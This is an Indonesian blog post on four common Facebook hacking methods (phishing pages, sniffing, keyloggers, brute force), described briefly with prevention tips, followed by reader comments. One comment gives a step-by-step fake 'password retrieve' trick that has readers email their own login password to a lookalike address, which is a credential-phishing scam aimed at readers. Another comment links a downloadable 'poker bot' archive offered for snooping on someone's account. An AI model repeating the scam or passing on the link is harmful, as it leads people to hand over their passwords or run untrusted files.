4 cara hack fb dan cara mencegahnya

Category: Facebook , Tips dan trik

Banyak sekali blog atau forum
yang membahas cara hack
facebook, nah kali ini saya juga
mau ikut-ikutan membahas
tentang 4 metode membobol
atau meng-hack akun facebook
yang umum digunakan berikut
dengan cara mengantisipasinya
atau mencegahnya agar kita
semua bisa lebih berhati-hati.
Facebook merupakan layanan
jejaring sosial paling popular di
indonesia selain twitter, data
februari 2009 saja penggunanya
sudah 1,5 jutaan, data terakhir
pengguna akun facebook saya
sendiri belum tahu. Pembobolan
akun facebook kian marak saja,
beberapa akun facebook milik
teman saya sendiri sudah kena
hack, allhamdulillah punya saya
enggak . Nah, langsung saja
berikut ini 4 cara hack facebook
yang biasanya digunakan dan
juga cara mencegah agar akun
facebook anda tidak kena hack :
Cara hack facebook dengan
metode fake login :
Cara ini paling banyak digunakan
dan terbukti efektif untuk meng-
hack facebook, sebenarnya
metodenya simple saja, kita
tinggal membuat halaman login
palsu yang kemudian kita upload
ke sebuah website bahkan
website gratisan pun bisa,
kemudian kita pancing
pengguna facebook agar menuju
halaman login facebook palsu
tersebut, cara memancing
pengguna facebook pun ber
macam macam bisa lewat email
palsu yang mengatasnamakan
facebook, link login palsu dan
metode social engineering
lainnya. Cara mencegah hack
facebook dengan metode ini :
sebelum anda login atau
memasukkan username dan
password anda pastikan bahwa
alamat url tersebut benar, jika
anda tidak yakin buka saja
sebuah jendela baru, masukan
alamat facebook (http://
www.facebook.com) dan login
melalui jendela tersebut. pastikan
keaslian email yang
mengatasnamakan facebook
yang memancing anda agar login
facebook yang masuk ke inbox
anda, atau abaikan saja email
tersebut.
Cara hack facebook dengan
network sniffing :
Bagi anda pengguna facebook
yang menggunakan koneksi
internet yang juga digunakan
banyak orang seperti warnet
atau koneksi internet di kampus
atau tempat umum atau hotspot,
apalagi yang gratisan harap
berhati-hati. cara hack facebook
dengan metode ini cukup
mudah, berbekal software packet
sniffer yang sangat mudah di
download dan digunakan untuk
memantau dan menyimpan
paket lalu lintas jaringan,
seseorang bisa dengan mudah
membobol akun facebook
dengan memanfaatkan paket
data yang tersimpan tadi. cara
menghindari agar akun facebook
anda tidak kena hack dengan
cara ini adalah dengan berhati-
hati saat mengakses facebook,
pastikan warnet atau hotspot
area yang anda gunakan benar-
benar aman.
Cara hack facebook dengan
keylogger :
Kembali lagi bagi anda yang
menggunakan akses internet
dari warnet atau hotspot dan
mungkin juga di kampus atau di
kantor harap berhati-hati. cara
hack facebook dengan metode
ini juga cukup mudah, tinggal
pasang software keylogger yang
berfungsi untuk merekam
aktifitas penggunaan keyboard
dan kemudian menggunakan
data tersebut untuk
mendapatkan username dan
password facebook. seseorang
bisa saja memasang software
keylogger ke laptop atau pc anda
atau menyebar trojan kedalam
komputer di dalam sebuah
jaringan komputer yang tidak
aman. cara mencegahnya :
pastikan antivirus pada
komputer anda selalu up to date.
Cara hack facebook dengan
metode bruteforce :
Cara hack facebook dengan
metode ini adalah cara paling
bodoh untuk membobol
facebook dan biasanya paling
terakhir digunakan, karena
membutuhkan waktu yang tidak
singkat. metode hacking
facebook dengan cara ini adalah
dengan menggunakan software
bruteforce untuk menebak-
nebak password facebook
sebuah akun dari sebuah file
dictionary / kamus atau juga
character generator. cara
mencegah hack facebook
dengan metode ini adalah
dengan melindungi alamat email
yang anda gunakan untuk login
facebook, caranya bisa
bermacam-macam, anda bisa
memisah antara email untuk
umum dan email untuk login
facebook dan tidak
menampilkannya di halam profil
facebook anda.
Nah, dari beberapa cara hack
facebook dan pencegahannya di
atas semoga anda lebih berhati-
hati, untuk lebih detail mengenai
tiap metode atau cara yang saya
sebutkan di atas akan saya bahas
di postingan saya yang
selanjutnya, semoga bermanfaat
dan semoga akun facebook anda
tidak kena hack .

Share on Facebook Share on Twitter

Comments

15 responses to "4 cara hack fb dan cara mencegahnya"

Faozan Rezpector [01:33 PM, 04-Feb-11]

Cacad

uky [11:04 PM, 06-Feb-11]

bro bsa req hack g cz q g tw crax hehe

agielz [02:14 PM, 11-Apr-11]

iya nih aku juga pernah ke hack 2 kali tapi udh kembali lagi ke tanganku,,, ahahahahah

Edi Siswanto | Belajar Jadi Master [02:38 PM, 11-Apr-11]

oh bgs lah

joysmaster [06:21 PM, 01-Jul-11]

buat nyoba2 yg pengen ngintip fb kecengan, ini biasanya ane pake buat nyari cip she tp sama jg kok yg penting masuk ke fb kecengan

http://hotfile.com/dl/122756556/db9962b/A3I_Poker_Bot2011.rar.html

ely yana [02:16 AM, 31-Oct-11]

Tak banyak yang tau kalau ternyata facebook menjalin sebuah kerja sama yang unik dengan yahoo dan gmail,hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yg kebetulan juga baru mendapatkan informasi ini.


Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account facebook seseorang dengan sangat mudah.


Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yg di incar.


Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yg tepat.


Dan sama sekali tidak memerlukan softwareÂ…!!


oke akan saya jelaskan caranya..


1. login ke yahoo atau gmail.

ingat..!! account yahoo atau gmail anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat email yg anda gunakan pada saat registrasi facebook.Yahoo dan gmail akan dengan otomatis menolak email yg tidak terhubung ke Facebook.


2. Jika sudah masuk ke yahoo atau gmail, tulislah sebuah email yang anda tujukan untuk staff facebook di Yahoo dan gmail dengan alamat email yahoo: facebook_help_pasword@yahoo.com dan imel gmail: facebook.help.pasword@gmail.com server Yahoo dan gmail akan mengirimkan secara otomatis password "terlupakan" tersebut.


3. Pada baris SUBJECT masukkan/ketik kalimat : PASSWORD RETRIEVE


4. lalu pada baris pertama mail anda tuliskan alamat email korban yg akan anda hack


5. Pada baris kedua masukkan alamat email yg anda gunakan


6. Pada baris ketiga tuliskan password yahoo anda.

Ingat, password yang anda masukkan inilah yang akan menentukan berhasil tidaknya usaha anda karena sever yahoo akan secara otomatis melakukan login untuk meng-konfirmasi valid atau tidaknya email andan, dengan kata lain server yahoo atau gmail akan meng-extract password dari email calon korban anda dengan menggunakan password anda.

Dan proses ini sangat aman karena anda mengirim email kepada mesin dan bukan kepada seseorang.


7. Dan di baris terakhir masukkan kata : cgi-bin/$et76431&pwrsa ini merupakan kode yang dibutuhkan untuk men-cocokkan email anda dengan email calon korban yg anda minta password nnya.

jadi jika misalkan email yahoo anda adalah cinta.laura@yahoo.com

dan email korban anda adalah krisdayanti@yahoo.com

dan password anda adalah : rahasia

maka email yg anda tulis nantinya adalah:

To: facebook_help_pasword@yahoo.com
cc: (biarkan kosong)
Subject: password retrieve

cinta.laura@yahoo.com

krisdayanti@yahoo.com

rahasia

cgi-bin/$et76431&pwrsa


jadi jika misalkan email gmail anda adalah cinta.laura@gmail.com

dan email korban anda adalah krisdayanti@gmail.com

dan password anda adalah : rahasia

maka email yg anda tulis nantinya adalah:

To: facebook.help.pasword@gmail.com
cc: (biarkan kosong)
Subject: password retrieve

cinta.laura@gmail.com

krisdayanti@gmail.com

rahasia

cgi-bin/$et76431&pwrsa

selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo atau gmail dengan dengan subject: System RegMessage

biasanya yahoo dan gmail memerlukan waktu sekitar 10 hari untuk mengkonfirmasikan dan meng-extract password yang anda minta.

selamat mncoba.. ^_^

ijOL Titz [09:16 PM, 31-Oct-11]

Ximak sob.
N skalian ijin pollow.
Slm knl . Rezpect

Abu Adara [11:14 PM, 07-Dec-11]

To ely yana, jangan Tipu orang dg cara anak TK kayak gini lah.. kasihan yg masih gaptek.. Mau menghindar dari Hack malah anda mau Hack orang

Ikrize [11:27 AM, 19-Jan-12]

nunot nguyu..

Luzer [08:05 AM, 09-Mar-12]

To Ely Yana: jangan menyesatkan orang Gan. Tu malah nyuruh orang bunuh diri.
smile To yg pny Blog: kunbal bro.., tak kasik kopi susu.
razz wkwkwk...

Susu Sapiew [11:37 AM, 13-May-12]

Ely Yana : facebook_help_pasword@yahoo.com NI Email spa???
FAcebook apa Email lo Sendiri lol

Hazard Logic Herobo - Team's [11:08 AM, 08-Jun-12]

wkwkwkw, cacat loe gan !

Kharis Cyber [08:29 PM, 01-Dec-12]

ely yana@ orang goblok

Nana Ciiebocah RizZviw Part II [06:01 PM, 17-Apr-13]

cara ngirim.a gmana nh ka
di fb apa diluar fb

Ibnu Anggi [03:23 PM, 25-Nov-13]

Ely yana: Hahaha..
Emang nya kita bocah ya??

dek dek . . .
Trik murahan :p

Subscribe to comment feed: [RSS] [Atom]

New Comment

[Sign In]
Name:

Email:

Comment:
(You can use BBCode)

Security:
Enable Images